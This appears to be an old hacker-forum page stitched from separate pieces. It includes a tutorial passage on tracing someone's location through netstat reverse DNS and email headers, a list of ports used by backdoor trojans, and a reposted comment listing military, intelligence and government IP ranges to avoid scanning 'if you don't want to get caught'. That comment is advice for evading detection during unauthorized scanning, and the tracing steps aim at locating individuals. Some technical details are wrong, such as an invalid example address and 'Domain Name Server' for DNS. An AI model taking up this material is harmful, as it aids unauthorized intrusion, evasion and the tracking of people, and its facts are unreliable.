This is probably the most effective way of running a trace on somebody. If ever you're in a chatroom and you see someone saying that they've "hacked into a satellite orbiting the Earth, and are taking pictures of your house right now", ignore them because that's just bad movie nonsense. THIS method is the way to go, with regard to finding out what country (even maybe what State/City etc) someone resides, although it's actually almost impossible to find an EXACT geographical location without actually breaking into your ISP's Head Office and running off with the safe.

To run an rDNS query, simply go back to MS-DOS and type

netstat

and hit return. Any active connections will resolve to hostnames rather than a numerical format.

# DNS

DNS stands for Domain Name Server. These are machines connected to the Internet whose job it is to keep track of the IP Addresses and Domain Names of other machines. When called upon, they take the ASCII Domain Name and convert it to the relevant numeric IP Address. A DNS search translates a hostname into an IP address....which is why we can enter "www.Hotmail.com" and get the website to come up, instead of having to actually remember Hotmail's IP address and enter that instead. Well, Reverse DNS, of course, translates the IP Address into a Hostname (ie - in letters and words instead of numbers, because sometimes the Hacker will employ various methods to stop Netstat from picking up a correct Hostname).

So, for example,

298.12.87.32 is NOT a Hostname.
mail6.bol.net.au IS a Hostname.

Anyway, see the section at the end? (au) means the target lives in Australia. Most (if not all) hostnames end in a specific Country Code, thus narrowing down your search even further. If you know your target's Email Address (ie they foolishly sent you a hate mail, but were silly enough to use a valid email address) but nothing else, then you can use the Country codes to deduce where they're from as well. You can also deduce the IP address of the sender by looking at the emails header (a "hidden" line of code which contains information on the sender)...on Hotmail for example, go to Preferences, and select the "Full Header's Visible" option. Alternatively, you can run a "Finger" Trace on the email address, at:

Code:   http://www.samspade.org

Plus, some ISP's include their name in your Email Address with them too (ie Wanadoo, Supanet etc), and your Hacker may be using an email account that's been provided by a Website hosting company, meaning this would probably have the website host's name in the email address (ie Webspawners). So, you could use the information gleaned to maybe even hunt down their website (then you could run a website check as mentioned previously) or report abuse of that Website Provider's Email account (and thus, the Website that it goes with) to

abuse@companynamegoeshere.com

## List of Ports commonly used by Trojans ##

Please note that this isn't a complete list by any means, but it will give you an idea of what to look out for in Netstat. Be aware that some of the lower Ports may well be running valid services.

UDP: 1349 Back Ofrice DLL
31337 BackOfrice 1.20
31338 DeepBO
54321 BackOfrice 2000


TCP: 21 Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
23 Tiny Telnet Server
25 Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.3


Never scan this IP's

Comments Posted by wildrank on Monday, September 06, 2010
U will find dis post like in every forum


If you don't want to get caught , absolutely don't scan following IPs!
RANGE 6
6.* - Army Information Systems Center

RANGE 7
7.*.*.* Defense Information Systems Agency, VA

RANGE 11
11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC

RANGE 21
21. - US Defense Information Systems Agency

RANGE 22
22.* - Defense Information Systems Agency

RANGE 24
24.198.*.*

RANGE 25
25.*.*.* Royal Signals and Radar Establishment, UK

RANGE 26
26.* - Defense Information Systems Agency

RANGE 29
29.* - Defense Information Systems Agency

RANGE 30
30.* - Defense Information Systems Agency

RANGE 49
49.* - Joint Tactical Command

RANGE 50
50.* - Joint Tactical Command

RANGE 55
55.* - Army National Guard Bureau

RANGE 55
55.* - Army National Guard Bureau

RANGE 62
62.0.0.1 - 62.30.255.255 Do not scan!

RANGE 64
64.70.*.* Do not scan
64.224.* Do not Scan
64.225.* Do not scan
64.226.* Do not scan

RANGE 128
128.37.0.0 Army Yuma Proving Ground
128.38.0.0 Naval Surface Warfare Center
128.43.0.0 Defence Research Establishment-Ottawa
128.47.0.0 Army Communications Electronics Command
128.49.0.0 Naval Ocean Systems Center
128.50.0.0 Department of Defense
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.190.0.0 Army Belvoir Reasearch and Development Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.217.0.0 NASA Kennedy Space Center
128.236.0.0 U.S. Air Force Academy

RANGE 129
129.23.0.0 Strategic Defense Initiative Organization
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.53.0.0 - 129.53.255.255 66SPTG-SCB
129.54.0.0 Vandenberg Air Force Base, CA
129.92.0.0 Air Force Institute of Technology
129.99.0.0 NASA Ames Research Center
129.131.0.0 Naval Weapons Center
129.139.0.0 Army Armament Research Development and Engineering Center
129.141.0.0 85 MISSION SUPPORT SQUADRON/SCSN
129.163.0.0 NASA/Johnson Space Center
129.164.0.0 NASA IVV
129.165.0.0 NASA Goddard Space Flight Center
129.166.0.0 NASA - John F. Kennedy Space Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 U.S. Army Corps of Engineers
129.251.0.0 United States Air Force Academy

RANGE 130
130.40.0.0 NASA Johnson Space Center
130.90.0.0 Mather Air Force Base
130.109.0.0 Naval Coastal Systems Center
130.114.0.0 Army Aberdeen Proving Ground Installation Support Activity
130.124.0.0 Honeywell Defense Systems Group
130.165.0.0 U.S.Army Corps of Engineers
130.167.0.0 NASA Headquarters

RANGE 131
131.3.0.0 - 131.3.255.255 Mather Air Force Base
131.6.0.0 Langley Air Force Base
131.10.0.0 Barksdale Air Force Base
131.17.0.0 Sheppard Air Force Base
131.21.0.0 Hahn Air Base
131.22.0.0 Keesler Air Force Base
131.24.0.0 6 Communications Squadron
131.25.0.0 Patrick Air Force Base
131.27.0.0 75 ABW
131.30.0.0 62 CS/SCSNT
131.32.0.0 37 Communications Squadron
131.35.0.0 Fairchild Air Force Base
131.36.0.0 Yokota Air Base
131.37.0.0 Elmendorf Air Force Base
131.38.0.0 Hickam Air Force Base
131.39.0.0 354CS/SCSN
131.40.0.0 Bergstrom Air Force Base
131.44.0.0 Randolph Air Force Base
131.46.0.0 20 Communications Squadron
131.47.0.0 Andersen Air Force Base
131.50.0.0 Davis-Monthan Air Force Base
131.52.0.0 56 Communications Squadron /SCBB
131.54.0.0 Air Force Concentrator Network
131.56.0.0 Upper Heyford Air Force Base
131.58.0.0 Alconbury Royal Air Force Base
131.59.0.0 7 Communications Squadron
131.61.0.0 McConnell Air Force Base
131.62.0.0 Norton Air Force Base
131.71.0.0 - 131.71.255.255 NAVAL AVIATION DEPOT CHERRY PO
131.74.0.0 Defense MegaCenter Columbus
131.84.0.0 Defense Technical Information Center
131.92.0.0 Army Information Systems Command - Aberdeen (EA)
131.105.0.0 McClellan Air Force Base
131.110.0.0 NASA/Michoud Assembly Facility
131.120.0.0 Naval Postgraduate School
131.121.0.0 United States Naval Academy
131.122.0.0 United States Naval Academy
131.176.0.0 European Space Operations Center
131.182.0.0 NASA Headquarters
131.250.0.0 Office of the Chief of Naval Research

RANGE 132
132.3.0.0 Williams Air Force Base
132.5.0.0 - 132.5.255.255 49th Fighter Wing
132.6.0.0 Ankara Air Station
132.7.0.0 - 132.7.255.255 SSG/SINO
132.9.0.0 28th Bomb Wing
132.10.0.0 319 Comm Sq
132.11.0.0 Hellenikon Air Base
132.12.0.0 Myrtle Beach Air Force Base
132.13.0.0 Bentwaters Royal Air Force Base
132.14.0.0 Air Force Concentrator Network
132.15.0.0 Kadena Air Base
132.16.0.0 Kunsan Air Base
132.17.0.0 Lindsey Air Station
132.18.0.0 McGuire Air Force Base
132.19.0.0 100CS (NET-MILDENHALL)
132.20.0.0 35th Communications Squadron
132.21.0.0 Plattsburgh Air Force Base
132.22.0.0 23Communications Sq
132.24.0.0 Dover Air Force Base
132.25.0.0 786 CS/SCBM
132.27.0.0 - 132.27.255.255 39CS/SCBBN
132.28.0.0 14TH COMMUNICATION SQUADRON
132.30.0.0 Lajes Air Force Base
132.31.0.0 Loring Air Force Base
132.33.0.0 60CS/SCSNM
132.34.0.0 Cannon Air Force Base
132.35.0.0 Altus Air Force Base
132.37.0.0 75 ABW
132.38.0.0 Goodfellow AFB
132.39.0.0 K.I. Sawyer Air Force Base
132.40.0.0 347 COMMUNICATION SQUADRON
132.42.0.0 Spangdahlem Air Force Base
132.43.0.0 Zweibruchen Air Force Base
132.45.0.0 Chanute Air Force Base
132.46.0.0 Columbus Air Force Base
132.48.0.0 Laughlin Air Force Base
132.49.0.0 366CS/SCSN
132.50.0.0 Reese Air Force Base
132.52.0.0 Vance Air Force Base
132.54.0.0 Langley AFB
132.55.0.0 Torrejon Air Force Base
132.56.0.0 - 132.56.255.255 9 CS/SC
132.57.0.0 Castle Air Force Base
132.58.0.0 Nellis Air Force Base
132.59.0.0 24Comm SquadronSCSNA
132.60.0.0 - 132.60.255.255 42ND COMMUNICATION SQUADRON
132.61.0.0 SSG/SIN
132.62.0.0 - 132.62.255.255 377 COMMUNICATION SQUADRON
132.79.0.0 Army National Guard Bureau
132.80.0.0 - 132.80.255.255 NGB-AIS-OS
132.80.0.0 - 132.85.255.255 National Guard Bureau
132.82.0.0 Army National Guard Bureau
132.86.0.0 National Guard Bureau
132.87.0.0 - 132.93.255.255 National Guard Bureau
132.94.0.0 Army National Guard Bureau
132.95.0.0 - 132.103.255.255 National Guard Bureau
132.95.0.0 - 132.108.0.0 DOD Network Information Center
132.104.0.0 - 132.104.255.255 Army National Guard Bureau
132.105.0.0 - 132.108.255.255 Army National Guard Bureau
132.109.0.0 National Guard Bureau
132.110.0.0 - 132.116.255.255 Army National Guard Bureau
132.114.0.0 Army National Guard
132.117.0.0 Army National Guard Bureau
132.118.0.0 - 132.132.0.0 Army National Guard Bureau
132.122.0.0 South Carolina Army National Guard, USPFO
132.133.0.0 National Guard Bureau
132.134.0.0 - 132.143.255.255 National Guard Bureau
132.159.0.0 Army Information Systems Command
132.193.0.0 Army Research Office
132.250.0.0 Naval Research Laboratory

RANGE 134
134.5.0.0 Lockheed Aeronautical Systems Company
134.11.0.0 The Pentagon
134.12.0.0 NASA Ames Research Center
134.51.0.0 Boeing Military Aircraft Facility
134.52.*.* Boeing Corporation
134.78.0.0 Army Information Systems Command-ATCOM
134.80.0.0 Army Information Systems Command
134.118.0.0 NASA/Johnson Space Center
134.131.0.0 Wright-Patterson Air Force Base
134.136.0.0 Wright-Patterson Air Force Base
134.164.0.0 Army Engineer Waterways Experiment Station
134.165.0.0 Headquarters Air Force Space Command
134.194.0.0 U.S. Army Aberdeen Test Center
134.205.0.0 7th Communications Group
134.207.0.0 Naval Research Laboratory
134.229.0.0 Navy Regional Data Automation Center
134.230.0.0 Navy Regional Data Automation Center
134.232.0.0 - 134.232.255.255 U.S. Army, Europe
134.233.0.0 HQ 5th Signal Command
134.234.0.0 - 134.234.255.255 Southern European Task Force
134.235.0.0 HQ 5th Signal Command
134.240.0.0 U.S. Military Academy
136.149.0.0 Air Force Military Personnel Center

RANGE 136
136.178.0.0 NASA Research Network
136.188.0.0 - 136.197.255.255 Defense Intelligence Agency
136.207.0.0 69th Signal Battalion
136.208.0.0 HQ, 5th Signal Command
136.209.0.0 HQ 5th Signal Command
136.210.0.0 HQ 5th Signal Command
136.212.0.0 HQ 5th Signal Command
136.213.0.0 HQ, 5th Signal Command
136.214.0.0 HQ, 5th Signal Command
136.215.0.0 HQ, 5th Signal Command
136.216.0.0 HQ, 5th Signal Command
136.217.0.0 HQ, 5th Signal Command
136.218.0.0 HQ, 5th Signal Command
136.219.0.0 HQ, 5th Signal Command
136.220.0.0 HQ, 5th Signal Command
136.221.0.0 HQ, 5th Signal Command
136.222.0.0 HQ, 5th Signal Command


RANGE 137
137.1.0.0 Whiteman Air Force Base
137.2.0.0 George Air Force Base
137.3.0.0 Little Rock Air Force Base
137.4.0.0 - 137.4.255.255 437 CS/SC
137.5.0.0 Air Force Concentrator Network
137.6.0.0 Air Force Concentrator Network
137.11.0.0 HQ AFSPC/SCNNC
137.12.0.0 Air Force Concentrator Network
137.17.* National Aerospace Laboratory
137.24.0.0 Naval Surface Warfare Center
137.29.0.0 First Special Operations Command
137.67.0.0 Naval Warfare Assessment Center
137.94.* Royal Military College
137.95.* Headquarters, U.S. European Command
137.126.0.0 USAF MARS
137.127.* Army Concepts Analysis Agency
137.128.* U.S. ARMY Tank-Automotive Command
137.130.0.0 Defense Information Systems Agency
137.209.0.0 Defense Information Systems Agency
137.210.0.0 Defense Information Systems Agency
137.211.0.0 Defense Information Systems Agency
137.212.0.0 Defense Information Systems Agency
137.231.0.0 HQ 5th Signal Command
137.232.0.0 Defense Information Systems Agency
137.233.0.0 Defense Information Systems Agency
137.234.0.0 Defense Information Systems Agency
137.235.0.0 Defense Information Systems Agency
137.240.0.0 Air Force Materiel Command
137.241.0.0 75 ABW
137.242.0.0 Air Force Logistics Command
137.243.0.0 77 CS/SCCN
137.244.0.0 78 CS/SCSC
137.245.0.0 Wright Patterson Air Force Base
137.246.0.0 United States Atlantic Command Joint Training

RANGE 138
138.13.0.0 Air Force Systems Command
138.27.0.0 Army Information Systems Command
138.50.0.0 HQ 5th Signal Command
138.65.0.0 HQ, 5th Signal Command
138.76.0.0 NASA Headquarters
138.109.0.0 Naval Surface Warfare Center
138.115.0.0 NASA Information and Electronic Systems Laboratory
138.135.0.0 - 138.135.255.255 DEFENSE PROCESSING CENTERPERAL HARBOR
138.136.0.0 - 138.136.255.255 Navy Computers and Telecommunications Station
138.137.0.0 Navy Regional Data Automation Center (NARDAC)
138.139.0.0 Marine Corps Air Station
138.140.0.0 Navy Regional Data Automation Center
138.141.0.0 Navy Regional Data Automation Center
138.142.0.0 Navy Regional Data Automation Center
138.143.0.0 Navy Regional Data Automation Center
138.144.0.0 NAVCOMTELCOM
138.145.0.0 NCTS WASHINGTON
138.146.0.0 NCTC
138.147.0.0 NCTC
138.148.0.0 NCTC
138.149.0.0 NCTC
138.150.0.0 NCTC
138.151.0.0 NCTC
138.152.0.0 NCTC
138.153.0.0 Yokosuka Naval Base
138.154.0.0 NCTC
138.155.0.0 NCTC
138.156.0.0 Marine Corps Central Design & Prog. Activity
138.157.0.0 - 138.157.255.255 Marine Corps Central Design & Prog. Activity
138.158.0.0 Marine Corps Central Design & Prog. Activity
138.159.0.0 NCTC
138.160.0.0 Naval Air Station
138.161.0.0 NCTC
138.162.0.0 NCTC
138.163.0.0 NCTC
138.164.0.0 NCTC
138.165.0.0 NCTC
138.166.0.0 NCTC
138.167.0.0 NOC, MCTSSA, East
138.168.0.0 Marine Corps Central Design & Prog. Activity
138.169.0.0 NAVAL COMPUTER AND TELECOMM
138.169.12.0 NAVAL COMPUTER AND TELECOMM
138.169.13.0 NAVAL COMPUTER AND TELECOMM
138.170.0.0 NCTC
138.171.0.0 NCTC
138.172.0.0 NCTC
138.173.0.0 NCTC
138.174.0.0 NCTC
138.175.0.0 NCTC
138.176.0.0 NCTC
138.177.0.0 NCTS Pensacola
138.178.0.0 NCTC
138.179.0.0 NCTC
138.180.0.0 NCTC
138.181.0.0 NCTC
138.182.0.0 CNO N60
138.183.0.0 NCTC
138.184.0.0 NCTS
138.193.0.0 NASA/Yellow Creek

RANGE 139
139.31.0.0 20th Tactical Fighter Wing
139.32.0.0 48th Tactical Fighter Wing
139.33.0.0 36th Tactical Fighter Wing
139.34.0.0 52nd Tactical Fighter Wing
139.35.0.0 50th Tactical Fighter Wing
139.36.0.0 66th Electronic Combat Wing
139.37.0.0 26th Tactical Reconnaissance Wing
139.38.0.0 32nd Tactical Fighter Squadron
139.39.0.0 81st Tactical Fighter Wing
139.40.0.0 10th Tactical Fighter Wing
139.41.0.0 39th Tactical Air Control Group
139.42.0.0 40th Tactical Air Control Group
139.43.0.0 401st Tactical Fighter Wing
139.124.* Reseau Infomratique
139.142.*.*

RANGE 140
140.1.0.0 Defense Information Systems Agency
140.3.0.0 Defense Information Systems Agency
140.4.0.0 Defense Information Systems Agency
140.5.0.0 Defense Information Systems Agency
140.6.0.0 Defense Information Systems Agency
140.7.0.0 Defense Information Systems Agency
140.8.0.0 Defense Information Systems Agency
140.9.0.0 Defense Information Systems Agency
140.10.0.0 Defense Information Systems Agency
140.11.0.0 Defense Information Systems Agency
140.12.0.0 Defense Information Systems Agency
140.13.0.0 Defense Information Systems Agency
140.14.0.0 DISA Columbus Level II NOC
140.15.0.0 Defense Information Systems Agency
140.16.0.0 Defense Information Systems Agency
140.17.0.0 Defense Information Systems Agency
140.18.0.0 Defense Information Systems Agency
140.19.0.0 Defense Information Systems Agency
140.20.0.0 Defense Information Systems Agency
140.21.0.0 Defense Information Systems Agency
140.22.0.0 Defense Information Systems Agency
140.23.0.0 Defense Information Systems Agency
140.24.0.0 ASIC ALLIANCE-MARLBORO
140.25.0.0 Defense Information Systems Agency
140.26.0.0 Defense Information Systems Agency
140.27.0.0 Defense Information Systems Agency
140.28.0.0 Defense Information Systems Agency
140.29.0.0 Defense Information Systems Agency
140.30.0.0 Defense Information Systems Agency
140.31.0.0 Defense Information Systems Agency
140.32.0.0 Defense Information Systems Agency
140.33.0.0 Defense Information Systems Agency
140.34.0.0 Defense Information Systems Agency
140.35.0.0 Defense Information Systems Agency
140.36.0.0 Defense Information Systems Agency
140.37.0.0 Defense Information Systems Agency
140.38.0.0 Defense Information Systems Agency
140.39.0.0 Defense Information Systems Agency
140.40.0.0 Defense Information Systems Agency
140.41.0.0 Defense Information Systems Agency
140.42.0.0 Defense Information Systems Agency
140.43.0.0 Defense Information Systems Agency
140.44.0.0 Defense Information Systems Agency
140.45.0.0 Defense Information Systems Agency
140.46.0.0 Defense Information Systems Agency
140.47.0.0 - 140.47.255.255 Defense Information Systems Agency
140.47.0.0 - 140.48.255.255 DOD Network Information Center
140.48.0.0 - 140.48.255.255 Defense Information Systems Agency
140.49.0.0 Defense Information Systems Agency
140.50.0.0 Defense Information Systems Agency
140.51.0.0 Defense Information Systems Agency
140.52.0.0 Defense Information Systems Agency
140.53.0.0 Defense Information Systems Agency
140.54.0.0 Defense Information Systems Agency
140.55.0.0 Defense Information Systems Agency
140.56.0.0 Defense Information Systems Agency
140.57.0.0 Defense Information Systems Agency
140.58.0.0 Defense Information Systems Agency
140.59.0.0 Defense Information Systems Agency
140.60.0.0 Defense Information Systems Agency
140.61.0.0 Defense Information Systems Agency
140.62.0.0 Defense Information Systems Agency
140.63.0.0 Defense Information Systems Agency
140.64.0.0 Defense Information Systems Agency
140.65.0.0 Defense Information Systems Agency
140.66.0.0 Defense Information Systems Agency
140.67.0.0 Defense Information Systems Agency
140.68.0.0 Defense Information Systems Agency
140.69.0.0 Defense Information Systems Agency
140.70.0.0 Defense Information Systems Agency
140.71.0.0 Defense Information Systems Agency
140.72.0.0 Defense Information Systems Agency
140.73.0.0 Defense Information Systems Agency
140.74.0.0 - 140.74.255.255 Defense Information Systems Agency
140.100.0.0 Naval Sea Systems Command
140.139.0.0 HQ US Army Medical Research and Development Command
140.154.0.0 HQ 5th Signal Command
140.155.0.0 HQ, 5th Signal Command
140.156.0.0 HQ, 5th Signal Command
140.175.0.0 Scott Air Force Base
140.178.0.0 Naval Undersea Warfare Center Division, Keyport
140.187.0.0 Fort Bragg
140.194.0.0 US Army Corps of Engineers
140.195.0.0 Naval Sea Systems Command
140.199.0.0 Naval Ocean Systems Center
140.201.0.0 HQ, 5th Signal Command
140.202.0.0 106TH SIGNAL BRIGADE

RANGE 143
143.45.0.0 58th Signal Battalion
143.46.0.0 U.S. Army, 1141st Signal Battalion
143.68.0.0 Headquarters, USAISC
143.69.0.0 Headquarters, USAAISC
143.70.0.0 Headquarters, USAAISC
143.71.0.0 Headquarters, USAAISC
143.72.0.0 Headquarters, USAAISC
143.73.0.0 Headquarters, USAAISC
143.74.0.0 Headquarters, USAAISC
143.75.0.0 Headquarters, USAAISC
143.76.0.0 Headquarters, USAAISC
143.77.0.0 Headquarters, USAAISC
143.78.0.0 Headquarters, USAAISC
143.79.0.0 Headquarters, USAAISC
143.80.0.0 Headquarters, USAAISC
143.81.0.0 Headquarters, USAAISC
143.82.0.0 Headquarters, USAAISC
143.84.0.0 Headquarters, USAAISC
143.85.0.0 Headquarters, USAAISC
143.86.0.0 Headquarters, USAAISC
143.87.0.0 Headquarters, USAAISC
143.232.0.0 NASA Ames Research Center

RANGE 144
144.99.0.0 United States Army Information Systems Command
144.109.0.0 Army Information Systems Command
144.143.0.0 Headquarters, Third United States Army
144.144.0.0 Headquarters, Third United States Army
144.146.0.0 Commander, Army Information Systems Center
144.147.0.0 Commander, Army Information Systems Center
144.170.0.0 HQ, 5th Signal Command
144.192.0.0 United States Army Information Services Command-Campbell
144.233.0.0 Defense Intelligence Agency
144.234.0.0 Defense Intelligence Agency
144.235.0.0 Defense Intelligence Agency
144.236.0.0 Defense Intelligence Agency
144.237.0.0 Defense Intelligence Agency
144.238.0.0 Defense Intelligence Agency
144.239.0.0 Defense Intelligence Agency
144.240.0.0 Defense Intelligence Agency
144.241.0.0 Defense Intelligence Agency
144.242.0.0 Defense Intelligence Agency
144.252.0.0 U.S. Army LABCOM

RANGE 146
146.17.0.0 HQ, 5th Signal Command
146.80.0.0 Defence Research Agency
146.98.0.0 HQ United States European Command
146.154.0.0 NASA/Johnson Space Center
146.165.0.0 NASA Langley Research Center

RANGE 147
147.35.0.0 HQ, 5th Signal Command
147.36.0.0 HQ, 5th Signal Command
147.37.0.0 HQ, 5th Signal Command
147.38.0.0 HQ, 5th Signal Command
147.39.0.0 HQ, 5th Signal Command
147.40.0.0 HQ, 5th Signal Command
147.42.0.0 Army CALS Project
147.103.0.0 Army Information Systems Software Center
147.104.0.0 Army Information Systems Software Center
147.159.0.0 Naval Air Warfare Center, Aircraft Division
147.168.0.0 Naval Surface Warfare Center
147.169.0.0 HQ, 5th Signal Command
147.198.0.0 Army Information Systems Command
147.199.0.0 Army Information Systems Command
147.238.0.0 Army Information Systems Command
147.239.0.0 1112th Signal Battalion
147.240.0.0 US Army Tank-Automotive Command
147.242.0.0 19th Support Command
147.248.0.0 Fort Monroe DOIM
147.254.0.0 7th Communications Group

RANGE 148
148.114.0.0 NASA, Stennis Space Center

RANGE 150
150.113.0.0 1114th Signal Battalion
150.114.0.0 1114th Signal Battalion
150.125.0.0 Space and Naval Warfare Command
150.133.0.0 10th Area Support Group
150.144.0.0 NASA Goodard Space Flight Center
150.149.0.0 Army Information Systems Command
150.157.0.0 USAISC-Fort Lee
150.184.0.0 Fort Monroe DOIM
150.190.0.0 USAISC-Letterkenny
150.196.0.0 USAISC-LABCOM

RANGE 152
152.82.0.0 7th Communications Group of the Air Force
152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command
152.152.0.0 NATO Headquarters
152.154.0.0 Defense Information Systems Agency
152.229.0.0 Defense MegaCenter (DMC) Denver

RANGE 153
153.21.0.0 USCENTAF/SCM
153.22.0.0 USCENTAF/SCM
153.23.0.0 USCENTAF/SCM
153.24.0.0 USCENTAF/SCM
153.25.0.0 USCENTAF/SCM
153.26.0.0 USCENTAF/SCM
153.27.0.0 USCENTAF/SCM
153.28.0.0 USCENTAF/SCM
153.29.0.0 USCENTAF/SCM
153.30.0.0 USCENTAF/SCM
153.31.0.0 Federal Bureau of Investigation

RANGE 155
155.5.0.0 1141st Signal Bn
155.6.0.0 1141st Signal Bn
155.7.0.0 American Forces Information
155.8.0.0 U.S. ArmyFort Gordon
155.9.0.0 - 155.9.255.255 United States Army Information Systems Command
155.74.0.0 PEO STAMIS
155.75.0.0 US Army Corps of Engineers
155.76.0.0 PEO STAMIS
155.77.0.0 PEO STAMIS
155.78.0.0 PEO STAMIS
155.79.0.0 US Army Corps of Engineers
155.80.0.0 PEO STAMIS
155.81.0.0 PEO STAMIS
155.82.0.0 PEO STAMIS
155.83.0.0 US Army Corps of Enginers
155.84.0.0 PEO STAMIS
155.85.0.0 PEO STAMIS
155.86.0.0 US Army Corps of Engineers
155.87.0.0 PEO STAMIS
155.88.0.0 PEO STAMIS
155.96.0.0 Drug Enforcement Administration
155.149.0.0 1112th Signal Battalion
155.155.0.0 HQ, 5th Signal Command
155.178.0.0 Federal Aviation Administration
155.213.0.0 USAISC Fort Benning
155.214.0.0 Director of Information Management
155.215.0.0 USAISC-FT DRUM
155.216.0.0 TCACCIS Project Management Office
155.217.0.0 Directorate of Information Management
155.218.0.0 USAISC
155.219.0.0 DOIM/USAISC Fort Sill
155.220.0.0 USAISC-DOIM
155.221.0.0 USAISC-Ft Ord

RANGE 156
156.9.0.0 U. S. Marshals Service

RANGE 157
157.150.0.0 United Nations
157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET
157.202.0.0 US Special Operations Command
157.217.0.0 U. S. Strategic Command

RANGE 158
158.1.0.0 Commander, Tooele Army Depot
158.2.0.0 USAMC Logistics Support Activity
158.3.0.0 U.S. Army TACOM
158.4.0.0 UASISC Ft. Carson
158.5.0.0 1112th Signal Battalion
158.6.0.0 USAISC-Ft. McCoy
158.7.0.0 USAISC-FLW
158.8.0.0 US Army Soldier Support Center
158.9.0.0 USAISC-CECOM
158.10.0.0 GOC
158.11.0.0 UASISC-Vint Hill
158.12.0.0 US Army Harry Diamond Laboratories
158.13.0.0 USAISC DOIM
158.14.0.0 1112th Signal Battalion
158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville
158.16.0.0 Rocky Mountain Arsenal (PMRMA)
158.17.0.0 Crane Army Ammunition Activity
158.18.0.0 Defense Finance & Accounting Service Center
158.19.0.0 DOIM
158.20.0.0 DOIM
158.235.0.0 Marine Corps Central Design and Programming Activity
158.243.0.0 Marine Corps Central Design and Programming Activity
158.244.0.0 Marine Corps Central Design and Programming Activity
158.245.0.0 Marine Corps Central Design and Programming Activity
158.246.0.0 Marine Corps Central Design and Programming Activity

RANGE 159
159.120.0.0 Naval Air Systems Command (Air 4114)

RANGE 160
160.132.0.0 US Army Recruiting Command
160.135.0.0 36th Signal BN
160.138.0.0 USAISC
160.139.0.0 USAISC
160.140.0.0 HQ, United States Army
160.143.0.0 USAISC
160.145.0.0 1101st Signal Brigade
160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS
160.150.0.0 Commander, Moncrief Army Hospital

RANGE 161
161.124.0.0 NAVAL WEAPONS STATION

RANGE 162
162.32.0.0 Naval Aviation Depot Pensacola
162.45.0.0 Central Intelligence Agency
162.46.0.0 Central Intelligence Agency

RANGE 163
163.205.0.0 NASA Kennedy Space Center
163.206.0.0 NASA Kennedy Space Center

RANGE 164
164.45.0.0 Naval Ordnance Center, Pacific Division
164.49.0.0 United States Army Space and Strategic Defense
164.158.0.0 Naval Surface Warfare Center
164.217.0.0 Institute for Defense Analyses
164.218.0.0 Bureau of Naval Personnel
164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER
164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET
164.221.0.0 - 164.221.255.255 Information Technology
164.223.0.0 Naval Undersea Warfare Center
164.224.0.0 Secretary of the Navy
164.225.0.0 U.S. Army Intelligence and Security Command
164.226.0.0 Naval Exchange Service Command
164.227.0.0 Naval Surface Warfare Center, Crane Division
164.228.0.0 USCINCPAC J21T
164.229.0.0 NCTS-NOLA
164.230.0.0 Naval Aviation Depot
164.231.0.0 Military Sealift Command
164.232.0.0 - 164.232.255.255 United States Southern Command

RANGE 167
167.44.0.0 Government Telecommunications Agency

RANGE 168
168.68.0.0 USDA Office of Operations
168.85.0.0 Fort Sanders Alliance
168.102.0.0 Indiana Purdue Fort Wayne

RANGE 169
169.252.0.0 - 169.253.0.0 U.S. Department of State

RANGE 194

RANGE 195
195.10.* Various - Do not scan

RANGE 199
199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA

RANGE 203
203.59.0.0 - 203.59.255.255 Perth Australia iiNET

RANGE 204
204.34.0.0 - 204.34.15.0 IPC JAPAN
204.34.0.0 - 204.37.255.0 DOD Network Information Center
204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery
204.34.32.0 - 204.34.63.0 USACOM
204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE
204.34.128.0 DISA-Eucom / BBN-STD, Inc.
204.34.129.0 Defense Technical Information Center
204.34.130.0 GSI
204.34.131.0 NSA NAPLES ITALY
204.34.132.0 NAVSTA ROTA SPAIN
204.34.133.0 NAS SIGONELLA ITALY
204.34.134.0 Naval Air Warfare Center Aircraft Division
204.34.135.0 GSI
204.34.136.0 Naval Undersea Warfare Center USRD - Orlando
204.34.137.0 Joint Spectrum Center
204.34.138.0 GSI
204.34.139.0 HQ, JFMO Korea, Headquarters
204.34.140.0 DISA D75
204.34.141.0 U. S. Naval Air Facility, Atsugi Japan
204.34.142.0 Naval Enlisted Personnel Management Center
204.34.143.0 Afloat Training Group Pacific
204.34.144.0 HQ Special Operations Command - Europe
204.34.145.0 Commander Naval Base Pearl Harbor
204.34.147.0 NAVSEA Information Management Improvement Program
204.34.148.0 Q112
204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures
204.34.150.0 Resource Consultants, Inc.
204.34.151.0 Personnel Support Activity, San Diego
204.34.152.0 NAVAL AIR FACILITY, ADAK
204.34.153.0 NAVSEA Logistics Command Detachment
204.34.154.0 PEARL HARBOR NAVAL SHIPYARD
204.34.155.0 PEARL HARBOR NAVAL SHIPYARD
204.34.156.0 Defense Photography School
